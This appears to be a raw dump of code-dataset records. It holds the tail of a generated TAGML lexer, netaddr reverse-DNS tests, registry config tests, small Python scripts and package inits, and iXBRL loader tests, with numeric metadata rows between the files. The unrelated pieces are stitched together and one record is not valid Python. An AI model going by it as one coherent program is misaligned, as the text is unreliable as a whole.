"IMC_Comma", "IMC_Suffix", "IMC_WS", "IMC_EndCloseMarkup", "ITV_Comment",
"ITV_Text", "ITV_BeginOpenMarkup", "ITV_BeginTextVariation",
"ITV_BeginCloseMarkup", "ITV_EndTextVariation", "Comment", "TagOpenEndChar",
"TagCloseStartChar", "TextVariationStartTag", "TextVariationEndTag",
"TextVariationSeparator", "PIPE", "Optional", "Resume", "Suspend",
"TILDE", "LIST_OPENER", "LIST_CLOSER", "DOT", "COMMA", "LEFT_SQUARE_BRACKET",
"RIGHT_SQUARE_BRACKET", "DIGIT", "REGULAR_TEXT_ESCAPE_CHARACTER",
"TEXT_VARIATION_ESCAPE_CHARACTER", "COMMENT_ESCAPE_CHARACTER",
"SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER", "DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER",
"NameEndChar", "WS" ]
ruleNames = [ "DEFAULT_NamespaceOpener", "DEFAULT_Comment", "DEFAULT_BeginOpenMarkup",
"DEFAULT_BeginTextVariation", "DEFAULT_BeginCloseMarkup",
"DEFAULT_Text", "NAME", "IN_NamespaceIdentifier", "IN_WS",
"IN_NamespaceURI", "IN_NamespaceCloser", "IMO_Comment",
"IMO_Prefix", "IMO_Comma", "IMO_Divider", "IMO_Name",
"IMO_Suffix", "IMO_WS", "IMO_EndMilestoneMarkup", "IMO_EndOpenMarkup",
"A_IdAnnotation", "A_AnnotationName", "A_WS", "A_EQ",
"A_Ref", "A_EndOpenMarkup", "A_EndMilestoneMarkup", "AV_WS",
"AV_StringValue", "AV_NumberValue", "AV_TRUE", "AV_FALSE",
"AV_IdValue", "AV_RichTextOpener", "AV_ObjectOpener",
"AV_ListOpener", "RV_RefValue", "IRT_Comment", "IRT_BeginOpenMarkup",
"IRT_BeginTextVariation", "IRT_BeginCloseMarkup", "IRT_Text",
"IRT_RichTextCloser", "IO_WS", "IO_IdAnnotation", "IO_AnnotationName",
"IO_Ref", "IO_EQ", "IO_ObjectCloser", "IL_SEPARATOR",
"IL_ListCloser", "IMC_Prefix", "IMC_Name", "IMC_Divider",
"IMC_Comma", "IMC_Suffix", "IMC_WS", "IMC_EndCloseMarkup",
"ITV_Comment", "ITV_Text", "ITV_BeginOpenMarkup", "ITV_BeginTextVariation",
"ITV_BeginCloseMarkup", "ITV_EndTextVariation", "Comment",
"TagOpenEndChar", "TagCloseStartChar", "TextVariationStartTag",
"TextVariationEndTag", "TextVariationSeparator", "PIPE",
"Optional", "Resume", "Suspend", "TILDE", "LIST_OPENER",
"LIST_CLOSER", "DOT", "COMMA", "LEFT_SQUARE_BRACKET",
"RIGHT_SQUARE_BRACKET", "DIGIT", "REGULAR_TEXT_ESCAPE_CHARACTER",
"TEXT_VARIATION_ESCAPE_CHARACTER", "COMMENT_ESCAPE_CHARACTER",
"SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER", "DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER",
"ESCAPE_CHARACTER", "A", "B", "C", "D", "E", "F", "G",
"H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R",
"S", "T", "U", "V", "W", "X", "Y", "Z", "NameChar", "NameStartChar",
"NameEndChar", "WS" ]
grammarFileName = "TAGMLLexer.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
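# --- Editor's sketch: tokenising a small TAGML fragment with the standard
# antlr4 Python runtime. The sample string is illustrative only.
if __name__ == "__main__":
    from antlr4 import InputStream, CommonTokenStream

    lexer = TAGMLLexer(InputStream("[line>The rain in Spain<line]"))
    stream = CommonTokenStream(lexer)
    stream.fill()
    for token in stream.tokens:
        print(token.type, repr(token.text))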
| 63.065056
| 103
| 0.59315
| 7,169
| 33,929
| 2.763984
| 0.16125
| 0.106687
| 0.069947
| 0.084986
| 0.282816
| 0.230987
| 0.159627
| 0.149937
| 0.149129
| 0.146505
| 0
| 0.316058
| 0.150933
| 33,929
| 537
| 104
| 63.182495
| 0.371772
| 0.002888
| 0
| 0.015444
| 1
| 0.413127
| 0.624708
| 0.562214
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003861
| false
| 0
| 0.007722
| 0
| 0.222008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
700fb6675137f81b8565f082a729eca3c9914cc4
| 416
|
py
|
Python
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 416
|
2015-01-02T18:23:32.000Z
|
2020-01-17T02:08:01.000Z
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 110
|
2015-01-07T16:14:40.000Z
|
2020-01-08T08:14:11.000Z
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 108
|
2015-02-25T09:47:31.000Z
|
2020-01-16T14:24:08.000Z
|
from netaddr import IPAddress


def test_reverse_dns_v4():
    assert IPAddress('172.24.0.13').reverse_dns == '13.0.24.172.in-addr.arpa.'


def test_reverse_dns_v6():
    assert IPAddress('fe80::feeb:daed').reverse_dns == ('d.e.a.d.b.e.e.f.0.0.0.0.0.0.0.0.'
                                                        '0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.'
                                                        'ip6.arpa.')
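# --- Editor's sketch: the IPv4 expectation is just the dotted quad reversed
# under in-addr.arpa, which a few lines of standard-library Python reproduce
# independently of netaddr.
def reverse_dns_v4_by_hand(address: str) -> str:
    # Reverse the four octets and append the in-addr.arpa suffix.
    return ".".join(reversed(address.split("."))) + ".in-addr.arpa."


assert reverse_dns_v4_by_hand('172.24.0.13') == '13.0.24.172.in-addr.arpa.'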
| 34.666667
| 90
| 0.478365
| 70
| 416
| 2.728571
| 0.4
| 0.209424
| 0.298429
| 0.376963
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0
| 0.155797
| 0.336538
| 416
| 11
| 91
| 37.818182
| 0.536232
| 0
| 0
| 0
| 0
| 0.285714
| 0.298077
| 0.213942
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.285714
| true
| 0
| 0.142857
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
706e6ac603cd54c981dfbaf6e86b9d703cc893ea
| 9,343
|
py
|
Python
|
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | 7
|
2021-11-19T00:06:38.000Z
|
2022-03-25T00:10:09.000Z
|
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | null | null | null |
from yarl import URL
from platform_registry_api.config import (
AuthConfig,
Config,
EnvironConfigFactory,
SentryConfig,
ServerConfig,
UpstreamRegistryConfig,
UpstreamType,
ZipkinConfig,
)
class TestEnvironConfigFactory:
def test_defaults_oauth(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TOKEN_URL": "https://test_host/token",
"NP_REGISTRY_UPSTREAM_TOKEN_SERVICE": "test_host",
"NP_REGISTRY_UPSTREAM_TOKEN_USERNAME": "test_username",
"NP_REGISTRY_UPSTREAM_TOKEN_PASSWORD": "test_password",
"NP_REGISTRY_AUTH_URL": "-",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.OAUTH,
token_endpoint_url=URL("https://test_host/token"),
token_service="test_host",
token_endpoint_username="test_username",
token_endpoint_password="test_password",
token_registry_catalog_scope="registry:catalog:*",
token_repository_scope_actions="*",
max_catalog_entries=100,
),
auth=AuthConfig(
server_endpoint_url=None,
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_oauth
def test_oauth(self) -> None:
environ = {
"NP_REGISTRY_API_PORT": "1234",
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "oauth",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "10000",
"NP_REGISTRY_UPSTREAM_TOKEN_URL": "https://test_host/token",
"NP_REGISTRY_UPSTREAM_TOKEN_SERVICE": "test_host",
"NP_REGISTRY_UPSTREAM_TOKEN_USERNAME": "test_username",
"NP_REGISTRY_UPSTREAM_TOKEN_PASSWORD": "test_password",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_REGISTRY_UPSTREAM_TOKEN_REGISTRY_SCOPE": "",
"NP_REGISTRY_UPSTREAM_TOKEN_REPO_SCOPE_ACTIONS": "push,pull",
"NP_CLUSTER_NAME": "test-cluster",
"NP_ZIPKIN_URL": "http://zipkin.io:9411/",
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_CLUSTER_NAME": "test",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(port=1234),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.OAUTH,
token_endpoint_url=URL("https://test_host/token"),
token_service="test_host",
token_endpoint_username="test_username",
token_endpoint_password="test_password",
token_registry_catalog_scope="",
token_repository_scope_actions="push,pull",
max_catalog_entries=10000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
zipkin=ZipkinConfig(URL("http://zipkin.io:9411/")),
sentry=SentryConfig(dsn=URL("https://sentry"), cluster_name="test"),
)
assert config.upstream_registry.is_oauth
def test_aws_ecr(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "aws_ecr",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.AWS_ECR,
max_catalog_entries=1000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert not config.upstream_registry.is_oauth
def test_defaults_basic(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "basic",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.BASIC,
max_catalog_entries=1000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_basic
assert not config.upstream_registry.is_oauth
def test_basic(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "basic",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
"NP_REGISTRY_UPSTREAM_BASIC_USERNAME": "testuser",
"NP_REGISTRY_UPSTREAM_BASIC_PASSWORD": "testpassword",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.BASIC,
max_catalog_entries=1000,
basic_username="testuser",
basic_password="testpassword",
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_basic
assert not config.upstream_registry.is_oauth
def test_create_zipkin_none(self) -> None:
result = EnvironConfigFactory({}).create_zipkin()
assert result is None
def test_create_zipkin_default(self) -> None:
env = {"NP_ZIPKIN_URL": "https://zipkin:9411"}
result = EnvironConfigFactory(env).create_zipkin()
assert result == ZipkinConfig(url=URL("https://zipkin:9411"))
def test_create_zipkin_custom(self) -> None:
env = {
"NP_ZIPKIN_URL": "https://zipkin:9411",
"NP_ZIPKIN_APP_NAME": "api",
"NP_ZIPKIN_SAMPLE_RATE": "1",
}
result = EnvironConfigFactory(env).create_zipkin()
assert result == ZipkinConfig(
url=URL("https://zipkin:9411"), app_name="api", sample_rate=1
)
def test_create_sentry_none(self) -> None:
result = EnvironConfigFactory({}).create_sentry()
assert result is None
def test_create_sentry_default(self) -> None:
env = {
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_CLUSTER_NAME": "test",
}
result = EnvironConfigFactory(env).create_sentry()
assert result == SentryConfig(dsn=URL("https://sentry"), cluster_name="test")
def test_create_sentry_custom(self) -> None:
env = {
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_APP_NAME": "api",
"NP_SENTRY_CLUSTER_NAME": "test",
"NP_SENTRY_SAMPLE_RATE": "1",
}
result = EnvironConfigFactory(env).create_sentry()
assert result == SentryConfig(
dsn=URL("https://sentry"),
app_name="api",
cluster_name="test",
sample_rate=1,
)
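# --- Editor's sketch of the pattern these tests exercise (not the
# platform_registry_api implementation): a factory method reads an env var,
# falls back to a default, and builds a typed config object. The class name
# and the 8080 default below are placeholders.
from dataclasses import dataclass


@dataclass(frozen=True)
class ServerConfigSketch:
    port: int = 8080


def create_server_sketch(environ: dict) -> ServerConfigSketch:
    # Missing variables fall back to defaults, as the tests above assert.
    return ServerConfigSketch(port=int(environ.get("NP_REGISTRY_API_PORT", 8080)))


assert create_server_sketch({}) == ServerConfigSketch()
assert create_server_sketch({"NP_REGISTRY_API_PORT": "1234"}).port == 1234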
| 39.757447
| 85
| 0.594028
| 916
| 9,343
| 5.646288
| 0.082969
| 0.079273
| 0.104408
| 0.04331
| 0.847254
| 0.820379
| 0.784416
| 0.768175
| 0.746326
| 0.724478
| 0
| 0.011096
| 0.295836
| 9,343
| 234
| 86
| 39.92735
| 0.775042
| 0
| 0
| 0.637209
| 0
| 0
| 0.295622
| 0.124371
| 0
| 0
| 0
| 0
| 0.083721
| 1
| 0.051163
| false
| 0.027907
| 0.009302
| 0
| 0.065116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
568dd41db8ead1c96dd184c053e0afb96a2ae266
| 38
|
py
|
Python
|
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | 1
|
2021-02-03T03:30:00.000Z
|
2021-02-03T03:30:00.000Z
|
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | null | null | null |
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | null | null | null |
from .calculation import ns as calc_ns
| 38
| 38
| 0.842105
| 7
| 38
| 4.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 1
| 38
| 38
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3b9d31f76bfe0efe3d4b7728de14a95a8cedec4e
| 121
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
name->Lara name->Lara
name->John Malkovich name->John Malkovich name->John Malkovich
name->Seven name->Seven name->Seven
| 30.25
| 62
| 0.77686
| 19
| 121
| 4.947368
| 0.263158
| 0.255319
| 0.542553
| 0.670213
| 0.585106
| 0.585106
| 0.585106
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 121
| 3
| 63
| 40.333333
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8e59729a803984658be1bca1e1c85e3d6c986f89
| 33
|
py
|
Python
|
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | null | null | null |
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | 19
|
2020-07-23T04:36:53.000Z
|
2022-02-15T01:09:48.000Z
|
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | null | null | null |
from .VaultMenu import VaultMenu
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8e95739cc31cf3a427492342bdbd790c8d3f286c
| 107
|
py
|
Python
|
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
with open("spiderman.txt") as song:
print(song.read(2))
print(song.read(8))
print(song.read())
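# --- Editor's sketch: read(n) consumes n characters from the current file
# position, so the three prints above emit consecutive, non-overlapping
# slices. The same behaviour on an in-memory buffer (the text is made up):
import io

song = io.StringIO("Spiderman, Spiderman, does whatever a spider can")
print(song.read(2))   # 'Sp'
print(song.read(8))   # 'iderman,'
print(song.read())    # the remainder of the buffer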
| 21.4
| 35
| 0.626168
| 17
| 107
| 3.941176
| 0.588235
| 0.402985
| 0.58209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.17757
| 107
| 4
| 36
| 26.75
| 0.738636
| 0
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8ec70417d2a360f493411330fa336f1e858d5b58
| 131
|
py
|
Python
|
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime as dt


def datetime_format(datetime) -> str:
    # NB: the parameter name shadows the usual datetime import; the class
    # itself is imported as dt, so the call below still resolves correctly.
    return dt.strftime(datetime, "%Y-%m-%d %H:%M:%S")
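# --- Editor's sketch: quick usage example for the helper above.
if __name__ == "__main__":
    print(datetime_format(dt(2024, 1, 31, 13, 45, 0)))  # -> 2024-01-31 13:45:00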
| 32.75
| 53
| 0.679389
| 21
| 131
| 4.190476
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 4
| 53
| 32.75
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.131783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
d920ab7a6c4651fa6e95cdc6b8f18613429f14c5
| 126
|
py
|
Python
|
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | 1
|
2020-02-17T00:16:01.000Z
|
2020-02-17T00:16:01.000Z
|
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | null | null | null |
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | 1
|
2020-06-26T06:54:00.000Z
|
2020-06-26T06:54:00.000Z
|
from .WeaponsTab import *
from .WeaponUsage import *
from .WeaponMaterial import *
from .Weapon import *
from .Melody import *
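These star imports re-export the public names of each submodule at package level. A runnable sketch of the underlying rule, using a throwaway module rather than the real WeaponsTab package: from module import * copies the names listed in __all__ (or, when __all__ is absent, every name not starting with an underscore):

import types

# build a throwaway module standing in for a submodule such as .Weapon
mod = types.ModuleType("weapon")
exec(
    "__all__ = ['Weapon']\n"
    "class Weapon: pass\n"
    "def _helper(): pass\n",  # underscore-prefixed: never star-imported
    mod.__dict__,
)
# what 'from weapon import *' would copy into the importing namespace
exported = {name: getattr(mod, name) for name in mod.__all__}
print(exported)  # {'Weapon': <class 'weapon.Weapon'>}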
| 25.2
| 29
| 0.769841
| 15
| 126
| 6.466667
| 0.466667
| 0.412371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150794
| 126
| 5
| 30
| 25.2
| 0.906542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d929f954fce5f71ddd8e24a1f920ce56fc970cd4
| 3,811
|
py
|
Python
|
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | 1
|
2022-01-27T14:53:23.000Z
|
2022-01-27T14:53:23.000Z
|
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | null | null | null |
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | null | null | null |
import xbrl
from xbrl.const import NS, LinkType, LinkGroup
import os.path
from urllib.request import pathname2url
import datetime
def test_loadixbrl():
    processor = xbrl.XBRLProcessor()
    url = "file:" + pathname2url(os.path.abspath(os.path.join(os.path.dirname(__file__), "simple-ixbrl.xhtml")))
    report = processor.loadIXBRLReport(url)
    assert len(report.facts) == 8
    f = report.facts.get("f1")
    assert f is not None
    assert f.value == "This is the first part of a continued tag.This is the second part of a continued tag.This is the third part of a continued tag."
    assert f.stringValue == "This is the first part of a continued tag.This is the second part of a continued tag.This is the third part of a continued tag."
    assert not f.isNumeric
    assert f.unit is None
    assert f.period.isDuration
    assert f.period.stringValue == '2018-01-01T00:00:00/2019-01-01T00:00:00'
    assert f.period.start == datetime.datetime(2018, 1, 1, 0, 0, 0)
    assert f.period.end == datetime.datetime(2019, 1, 1, 0, 0, 0)
    assert f.entity.scheme == 'http://www.example.com/entity'
    assert f.entity.identifier == '12345678'
    footnotes = f.links[LinkType.footnote][LinkGroup.default]
    assert len(footnotes) == 2
    fids = set((fn.id for fn in footnotes))
    assert fids == {"fn1", "fn2"}
    f = report.facts.get("f4")
    assert f is not None
    assert f.value == "1234.56"
    assert f.stringValue == "1234.56"
    assert f.isNumeric
    assert f.decimals == 2
    assert f.unit.stringValue == 'iso4217:EUR'
    assert f.period.isDuration
    assert f.period.stringValue == '2018-01-01T00:00:00/2019-01-01T00:00:00'
    assert f.period.start == datetime.datetime(2018, 1, 1, 0, 0, 0)
    assert f.period.end == datetime.datetime(2019, 1, 1, 0, 0, 0)
    assert f.entity.scheme == 'http://www.example.com/entity'
    assert f.entity.identifier == '12345678'
    footnotes = f.links[LinkType.footnote][LinkGroup.default]
    assert len(footnotes) == 2
    fids = set((fn.id for fn in footnotes))
    assert fids == {"fn2", "fn4"}
    f = report.facts.get("f5")
    assert f is not None
    assert f.value == "-567000"
    assert f.stringValue == "-567000"
    assert f.isNumeric
    assert f.decimals == 0
    assert f.unit.stringValue == 'iso4217:EUR'
    assert f.period.isDuration
    assert f.period.stringValue == '2017-01-01T00:00:00/2018-01-01T00:00:00'
    assert f.period.start == datetime.datetime(2017, 1, 1, 0, 0, 0)
    assert f.period.end == datetime.datetime(2018, 1, 1, 0, 0, 0)
    assert f.entity.scheme == 'http://www.example.com/entity'
    assert f.entity.identifier == '12345678'
    f = report.facts.get("f15")
    assert f is not None
    assert f.value == "And <b>a</b> nested < fact."
    assert not f.isNumeric
    assert f.period.isDuration
    assert f.period.stringValue == '2017-01-01T00:00:00/2018-01-01T00:00:00'
    assert f.entity.scheme == 'http://www.example.com/entity'
    assert f.entity.identifier == '12345678'
